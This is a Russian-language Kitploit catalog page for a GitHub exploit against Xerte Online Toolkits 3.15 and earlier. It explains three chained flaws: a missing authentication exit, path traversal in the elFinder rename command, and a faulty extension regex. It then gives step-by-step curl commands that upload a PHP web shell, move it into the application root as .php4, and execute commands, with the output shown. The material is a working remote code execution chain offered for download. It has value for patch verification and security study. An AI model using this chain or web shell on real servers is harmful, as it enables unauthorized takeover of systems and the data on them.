Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
xerteonlinetoolkits-rce — Эксплойт Xerte Online Toolkits без аутентификации. Требуется знать действительное имя пользователя. | Kitploit
Инструменты/GitHubGitHub/bootstrapbool/xerteonlinetoolkits-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubbootstrapbool/xerteonlinetoolkits-rce

xerteonlinetoolkits-rce

Эксплойт Xerte Online Toolkits без аутентификации. Требуется знать действительное имя пользователя.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
2 месяцев назадЕщё не проверено

Xerte Online Toolkits <= 3.15: удалённое выполнение кода

Xerte Online Toolkits версии 3.15 и более ранние содержат 3 уязвимости в компоненте /editor/elfinder/php/connector.php, которые неаутентифицированный злоумышленник может объединить в цепочку для достижения удалённого выполнения кода (RCE).

Затронутые версии

Xerte Online Toolkits <= 3.15

Бэкпортированный патч был применён к версиям 3.15, 3.14 и 3.13

CWE-306: Отсутствие аутентификации для критической функции - CVE-2026-34413

Неаутентифицированные пользователи могут отправлять запросы к компоненту connector по адресу /editor/elfinder/php/connector.php

Следующий код используется для контроля доступа.

Файл: /editor/elfinder/php/connector.php Номер строки: 35

root@kitploit:~
if (!isset($_SESSION['toolkits_logon_id'])){
    header("location: ../../../index.php");
}

Это перенаправляет неаутентифицированных пользователей, не позволяя им получать ответ на неаутентифицированные запросы, однако это не завершает сессию, и последующий код всё равно выполняется.

CWE-23: Относительный обход пути - CVE-2026-34414

*Требуется, чтобы злоумышленник знал имя файла, который он хочет переместить

Злоумышленники могут манипулировать параметром "name" в запросе "rename" к конечной точке connector.php. Это позволяет злоумышленникам использовать существующий каталог для перемещения файлов за пределы медиакаталога пользователя.

CWE-184: Неполный список запрещённых входных данных - CVE-2026-34415

Из-за ошибки в регулярном выражении фильтра расширений файлов в connector.php злоумышленники могут объединить уязвимость обхода пути, присутствующую в тех же версиях Xerte, чтобы переместить файл с вредоносным PHP-кодом в корень приложения с расширением .php4.

Файл: /editor/elfinder/php/connector.php Номер строки: 130

root@kitploit:~
array( // hide readmes
    'pattern' => '/(readme\.txt)|\.(html|php|php5|php*|phtml|phar|inc|py|pl|sh)$/i',
    'read'   => false,

Регулярное выражение php* соответствует только предшествующему символу. Поэтому оно будет соответствовать следующим строкам: "ph", "php", "phppp" и т.д.

Шаги воспроизведения цепочки атак

Неаутентифицированное удалённое выполнение кода

Если аутентификация включена (что не является конфигурацией Xerte по умолчанию), злоумышленник должен знать (или подобрать перебором) имя пользователя действительного пользователя. Если используется гостевая аутентификация (по умолчанию), целевой каталог проекта будет просто 1--Nottingham.

Неаутентифицированный злоумышленник может создать каталог "example_dir" и загрузить файл "file.txt" с вредоносным PHP-кодом в любой каталог проекта внутри USER-FILES/

Затем он может использовать уязвимости относительного обхода пути и неполного списка запрещённых входных данных, присутствующие в Xerte, для выполнения обхода пути, изменив имя загруженного файла на "example_dir/../../../../file.php4", переместив file.txt в корень приложения как "file.php4", что даёт злоумышленнику удалённое выполнение кода.

  1. Получите полный путь к корню приложения
root@kitploit:~
curl 'http://localhost/xt/setup'
  1. Создайте каталог

Параметры запроса: uploadDir: Корень приложения + USER-FILES/{project id}-{user}-Nottingham/ uploadURL: URL каталога проекта cmd: mkdir name: Имя нового каталога target: elfinder id каталога media/. Поскольку это корень elfinder, он всегда будет равен "l1_Lw"

root@kitploit:~
curl 'http://localhost/xt/editor/elfinder/php/connector.php?uploadDir=/opt/lampp/htdocs/xt/USER-FILES/1-user2-Nottingham/&uploadURL=http://localhost/xt/USER-FILES/1-user2-Nottingham/&cmd=mkdir&name=folder1&target=l1_Lw'
  1. Загрузите вредоносный PHP-файл

*Тег
в полезной нагрузке предотвращает обнаружение PHP-кода фильтром MIME-типов elfinder.

Параметры запроса: uploadDir: Корень приложения + USER-FILES/{project id}-{user}-Nottingham/ uploadURL: URL каталога проекта cmd: upload target: elfinder id каталога media/. Поскольку это корень elfinder, он всегда будет равен "l1_Lw" upload[]: Загружаемый файл.

root@kitploit:~
echo '<br><?php system($_GET["cmd"]); ?>' > file.txt
curl -X POST 'http://localhost/xt/editor/elfinder/php/connector.php?uploadDir=/opt/lampp/htdocs/xt/USER-FILES/1-user2-Nottingham/&uploadURL=http://localhost/xt/USER-FILES/1-user2-Nottingham/' \
    -F 'cmd=upload' \
    -F 'target=l1_Lw' \
    -F "upload[][email protected];type=text/plain"
  1. Сгенерируйте elfinder id для нового файла
root@kitploit:~
echo -n 'file.txt' | base64
ZmlsZS50eHQ=

Убедитесь, что вы обрезали padding; в данном случае это просто "="

Добавьте идентификатор тома. Он всегда будет равен "l1" (как в "/")

Результат: l1_ZmlsZS50eHQ

  1. Переименуйте файл и выполните относительный обход пути

Параметры запроса: uploadDir: Корень приложения + USER-FILES/{project id}-{user}-Nottingham/ uploadURL: URL каталога проекта cmd: rename name: Имя каталога, последовательность обхода пути и новое имя файла с расширением .php4 target: elfinder id, который мы сгенерировали для нового файла l1_ZmlsZS50eHQ

root@kitploit:~
curl 'http://localhost/xt/editor/elfinder/php/connector.php?uploadDir=/opt/lampp/htdocs/xt/USER-FILES/1-user2-Nottingham/&uploadURL=http://localhost/xt/USER-FILES/1-user2-Nottingham/&cmd=rename&name=folder1%2F..%2F..%2F..%2F..%2Fs.php4&target=l1_ZmlsZS50eHQ'
  1. Проверьте выполнение кода

Параметры запроса: cmd: Команда для выполнения

root@kitploit:~
curl http://localhost/xt/s.php4?cmd=id
<br>uid=1(daemon) gid=1(daemon) groups=1(daemon)
Скачать инструмент